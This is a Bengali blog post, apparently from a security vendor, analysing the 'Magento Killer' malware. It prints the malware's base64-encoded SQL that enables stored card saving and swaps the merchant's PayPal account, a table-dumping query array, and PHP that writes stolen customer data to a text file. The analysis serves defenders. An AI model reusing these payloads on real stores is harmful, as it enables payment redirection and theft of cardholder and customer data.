“Magento Killer” নামে একটি নতুন পাওয়া স্ক্রিপ্ট, ইদানীং Magento ওয়েবসাইটগুলিকে লক্ষ্য করে চলেছে ৷ স্ক্রিপ্ট ConfKiller একটি ওয়েবসাইট এর সবচেয়ে গুরুত্বপূর্ণ ফাইলকে লক্ষ্য করে। যেমন, configure file. $ConfKiller script যদি সফলভাবে কার্যকর করা হয় তবে আক্রমণ করা Magento database-এর core_configure _data টেবিল পরিবর্তন করতে পারে।
যদিও এটি সম্পূর্ণ Magento Installation-কে মেরে ফেলে না তবুও এটি ওয়েবসাইট এর ক্ষতি করে। Magento Killer গুরুতর ডাটা চুরি করতে কাজ করে, যেখানে ডেটা ক্রেডিট কার্ডের তথ্য, ব্যক্তিগতভাবে Identifiable Information, Email, billing ঠিকানা ইত্যাদি অন্তর্ভুক্ত করে।
$ConfKiller: The Modus Operandi
হ্যাকাররা ডাটা এই চুরি করার জন্য কয়েকটি ধাপ অনুসরণ করে। আমি যতটা সম্ভব সহজভাবে Magento Killer script-এর Modus operandi ব্যাখ্যা করার চেষ্টা করেছি।
ধাপ 1: Merchant’s PayPal account প্রতিস্থাপন করে
প্রথমত, আক্রমণকারী Base64-এ বিশেষভাবে এনকোড করা SQL query injection করে। এই injection-এর query নিম্নলিখিত কিছু দেখায়:
$ConfKiller = array(
'Update DB (Savecc)' =>
base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVfaWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs="),
//UPDATE `core_config_data` SET `scope` = "default', `scope_id` = '0', `path` = 'payment/ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active';
'Update PP (MailPP)' =>
base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lkYCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3RlZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7')
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/business_account';
যদি আমরা এই কোডটি ভঙ্গ করি, তাহলে আমরা দেখতে পাব যে এখানে দুটি অনুরোধ করা হচ্ছেঃ
- DB update করুন (Savecc): এই অনুরোধ, Magento website configure করে Client credit card server-এ তথ্য সংরক্ষণ করুন। এটি ব্যাকএন্ডে পাঠানোর সাধারণ দৃশ্যের পরিবর্তে, এটি একটি পেমেন্ট প্রসেসর (যেমন authorize.net)।
- Update pp (mailpp): এখন, হ্যাকার-এর ইচ্ছা অনুযায়ী টার্গেট করা Magento site-এ PayPal account-টিকে অন্য কোনো একাউন্ট প্রতিস্থাপন করে।
সাধারণত Magento স্থানীয়ভাবে সংরক্ষিত ক্রেডিট কার্ড এর তথ্য Encrypt করে। কিন্তু এই ক্ষেত্রে, এটি এখানে খুব বেশি সুরক্ষা দিতে পারে না।
তাই, আক্রমণকারী Magento ফাইল থেকে encryption key চুরি করতে সক্ষম। আপাতত তারা ওয়েবসাইট এর ফাইল সিস্টেম এক্সেস-এর অধিকারী। এই চাবি দিয়ে তারা ক্রেডিট কার্ডের তথ্যকে আরও বোধগম্য করে Decrypt করতে পারে। যেমন, একটি plaintext।
ধাপ 2: গ্রাহকের তথ্য চুরি করে
যদিও হ্যাকার ক্রেডিট কার্ডের তথ্য চুরি করেছে, সে সাপ্লিম্যান্টরি ডাটা ছাড়া এটি ব্যবহার করতে পারে না। সুতরাং, হ্যাকার পরবর্তী গ্রাহকের ডাটা, যেমনঃ পুরো নাম, ইমেইল, বিলিং ঠিকানা, ফোন নাম্বার ইত্যাদি ধরে রাখার চেষ্টা করে।
তিনি একটি প্রশ্ন হিসাবে কোড এর নিম্নলিখিত লাইনগুলি পাঠান যা হ্যাকারকে ডাটাবেজ প্রদর্শন করে:
$query = array( 'admin_user' => 'SELECT * FROM admin_user' , 'aw_blog_comment' => 'SELECT * FROM aw_blog_comment' , 'core_email_queue_recipients' => 'SELECT * FROM core_email_queue_recipients' , 'customer_entity' => 'SELECT * FROM customer_entity' ,
ধাপ 3: একটি text file-এ Data import করে
অবশেষে, তিনি একটি টেক্সেট এ কিছু গুরুত্বপূর্ণ ডাটা স্থানান্তর করেন। এক্ষেত্রে টেক্সেট ফাইল , *-shcMail.txt. নীচে এমন কিছু কোড রয়েছে যা Magento Killer দ্বারা attack-এর সাফল্য নিশ্চিত করে ৷
$namefile = md5(time())."-shcMail.txt";
foreach ($query as $shc_key => $shc_query) {
$hasil = mysql_query($shc_query);
while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
$mail[] = $kolom_db[$shcolom[$shc_key]];
$myfile = fopen($namefile, "a+") or die("Unable to open file!");
fwrite($myfile, $kolom_db[$shcolom[$shc_key]]."rn");
fclose($myfile);
উপসংহার
আপনি যদি লক্ষ্য করেন যে আপনার website এই malware দ্বারা সংক্রমিত হয়েছে, তাহলে আপনার Magento website থেকে malware পরিষ্কার করতে এই নির্দেশিকা অনুসরণ করুন ।
অথবা আপনি সম্পূর্ণভাবে অন্য দীর্ঘ পোস্ট পড়ার ঝামেলা এড়িয়ে যেতে পারেন এবং এখানে অবিলম্বে malware পরিষ্কার লাভ করতে পারেন। যদি আপনি সংক্রমিত না হন তবে, Magento Safety checklist দিয়ে আপনার ওয়েবসাইট সুরক্ষিত করুন।
